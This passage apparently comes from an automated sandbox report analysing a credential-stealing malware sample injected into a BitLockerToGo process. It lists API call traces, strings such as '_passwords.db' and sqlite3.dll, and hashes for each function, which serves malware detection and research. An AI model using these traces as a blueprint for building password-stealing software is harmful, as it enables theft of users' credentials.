                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d9fb904cca1ff651be6bc828ef5e0c71410c59b2a7eceb45286ce277ba297a1
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a992286b4004b1be4509ba78b5cdebdc47fb30b6c1b9f570d51946ed3e6cce2f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82526432D8012DAADF01FBA5EE82ADDB776AF04350B5145A1AE1077160DF31BF5A8F80
                                                                                                                                                                                                                                                                                                                                                          Function 02A19E25 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 2434 2a19e25-2a19e35 call 2a19d79 2437 2a1a026-2a1a083 LoadLibraryA * 5 2434->2437 2438 2a19e3b-2a1a021 call 2a07c77 GetProcAddress * 20 2434->2438 2439 2a1a085-2a1a092 GetProcAddress 2437->2439 2440 2a1a097-2a1a09e 2437->2440 2438->2437 2439->2440 2442 2a1a0a0-2a1a0c4 GetProcAddress * 2 2440->2442 2443 2a1a0c9-2a1a0d0 2440->2443 2442->2443 2445 2a1a0d2-2a1a0df GetProcAddress 2443->2445 2446 2a1a0e4-2a1a0eb 2443->2446 2445->2446 2448 2a1a0ed-2a1a0fa GetProcAddress 2446->2448 2449 2a1a0ff-2a1a106 2446->2449 2448->2449 2450 2a1a131 2449->2450 2451 2a1a108-2a1a12c GetProcAddress * 2 2449->2451 2451->2450
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19E66
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19E7D
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19E94
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19EAB
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19EC2
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19ED9
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19EF0
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F07
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F1E
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F35
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F4C
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F63
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F7A
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19F91
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19FA8
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19FBF
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19FD6
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A19FED
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A1A004
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A1A01B
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A02C
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A03D
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A04E
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A05F
                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,02A19CA1), ref: 02A1A070
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75070000,02A19CA1), ref: 02A1A08C
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75FD0000,02A19CA1), ref: 02A1A0A7
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A1A0BE
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(75A50000,02A19CA1), ref: 02A1A0D9
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(74E50000,02A19CA1), ref: 02A1A0F4
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(76E80000,02A19CA1), ref: 02A1A10F
                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 02A1A126
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2238633743-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 52f42005a8b4109379d3ef0d3ac58cc3a2c7707c05ee0f91008285642eb3e3f5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 22fa00d9800ad61eed8ae9af60d3f87cd4ae320712a3691ef054c2df9bedf700
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52f42005a8b4109379d3ef0d3ac58cc3a2c7707c05ee0f91008285642eb3e3f5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8071E97DCC1201EFDB1A9F60EE4AB673AF2F7082153054B25FE9592224D77258B0EB52
                                                                                                                                                                                                                                                                                                                                                          Function 02A09777 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 195memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0981D
                                                                                                                                                                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 02A09828
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02A09837
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02A0989A
                                                                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 02A098B0
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 02A098C7
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A098CE
                                                                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02A098E7
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A098FF
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02A0990B
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A09912
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A09921
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A3833C), ref: 02A0992D
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A09937
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,_passwords.db), ref: 02A09943
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,02A0AE7A), ref: 02A0997A
                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 02A09981
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 02A0998C
                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 02A09993
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0999C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Filelstrcat$Processlstrcpy$AllocateFree$CloseCopyCreateDeleteExistsHandlePathReadSizeSleepSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: _passwords.db
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3315713884-1485422284
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4fda7bc370af40d5a13f23ff44723adec44051edf1bd59c0c39a12799764609f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a1c29b31f336b958f7549f52d662a160c0768b6d2562c9bea416956b96770778
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fda7bc370af40d5a13f23ff44723adec44051edf1bd59c0c39a12799764609f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12613036D80219ABCB11BFB4ED89B9E7B79BF04751F004920FE05A3190DF359A568F92
                                                                                                                                                                                                                                                                                                                                                          Function 02A18705 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrlen.KERNEL32(?,?,02A19098,02A377FE,02A37787,?,?,?,?,02A19D6E), ref: 02A121AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrcpy.KERNEL32(00000000,00000000), ref: 02A121DD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18669
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: lstrlen.KERNEL32(?), ref: 02A18674
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: StrStrA.SHLWAPI(00000000,?), ref: 02A18689
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: lstrlen.KERNEL32(?), ref: 02A18698
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18615: lstrlen.KERNEL32(00000000), ref: 02A186B1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A187EF
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18848
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A188A8
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18901
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A18917
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A1892D
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A1893F
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 02A1894E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 02A189FD
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A188A0
                                                                                                                                                                                                                                                                                                                                                          • sqlite3.dll, xrefs: 02A189B7
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A18840
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A18937
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A188F9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3.dll, xrefs: 02A189EB
                                                                                                                                                                                                                                                                                                                                                          • sqlo.dll, xrefs: 02A18A4D
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A1890F
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A187E7
                                                                                                                                                                                                                                                                                                                                                          • ERROR, xrefs: 02A18925
                                                                                                                                                                                                                                                                                                                                                          • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 02A18A2E
                                                                                                                                                                                                                                                                                                                                                          • sqlo.dll, xrefs: 02A18A1C
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$sqlite3.dll$sqlite3.dll$sqlo.dll$sqlo.dll
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2840494320-2782864256
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 929efeaf5c7cbc8e4e404ed15c380a3205f075d2f645b97af11062810de7dd63
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 082e46caa6382ec9606fd950a5b2e7d8168924a726c991c54da8ead8d67be52a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 929efeaf5c7cbc8e4e404ed15c380a3205f075d2f645b97af11062810de7dd63
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0591D871E80228ABEB11FBA4EE46ACCB772BF00750B514561FE05B7160DF75AF098E81
                                                                                                                                                                                                                                                                                                                                                          Function 02A01656 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 2730 2a01656-2a0168e GetTempPathW 2731 2a01694-2a016bb wsprintfW 2730->2731 2732 2a017f9-2a017fb 2730->2732 2733 2a016c0-2a016e5 CreateFileW 2731->2733 2734 2a017ea-2a017f8 call 2a1e88c 2732->2734 2733->2732 2736 2a016eb-2a0173e GetProcessHeap RtlAllocateHeap _time64 srand rand call 2a25490 WriteFile 2733->2736 2736->2732 2740 2a01744-2a0174a 2736->2740 2740->2732 2741 2a01750-2a0178c call 2a25490 CloseHandle CreateFileW 2740->2741 2741->2732 2744 2a0178e-2a017a1 ReadFile 2741->2744 2744->2732 2745 2a017a3-2a017a9 2744->2745 2745->2732 2746 2a017ab-2a017e1 call 2a25490 GetProcessHeap RtlFreeHeap CloseHandle 2745->2746 2746->2733 2749 2a017e7-2a017e9 2746->2749 2749->2734
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 02A01686
                                                                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 02A016AC
                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 02A016D6
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 02A016EE
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A016F5
                                                                                                                                                                                                                                                                                                                                                          • _time64.MSVCRT ref: 02A016FE
                                                                                                                                                                                                                                                                                                                                                          • srand.MSVCRT ref: 02A01705
                                                                                                                                                                                                                                                                                                                                                          • rand.MSVCRT ref: 02A0170E
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A0171E
                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 02A01736
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A01753
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A01761
                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 02A0177D
                                                                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 02A01799
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A017AE
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A017B8
                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 02A017BF
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A017CB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3be7a9274b281273c9931ab62b20318207864dbdb30b0a36933b08a2fc01fc97
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ec9f35bd4d05967891944443cb66ed78c0b82f256dcc8c7f35cfe8ba0432a396
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3be7a9274b281273c9931ab62b20318207864dbdb30b0a36933b08a2fc01fc97
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB4171B1D40258ABDB205B71AC8DFEB7B7DEB89715F0009A9B50DE1081DF319965CE60
                                                                                                                                                                                                                                                                                                                                                          Function 02A04A56 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
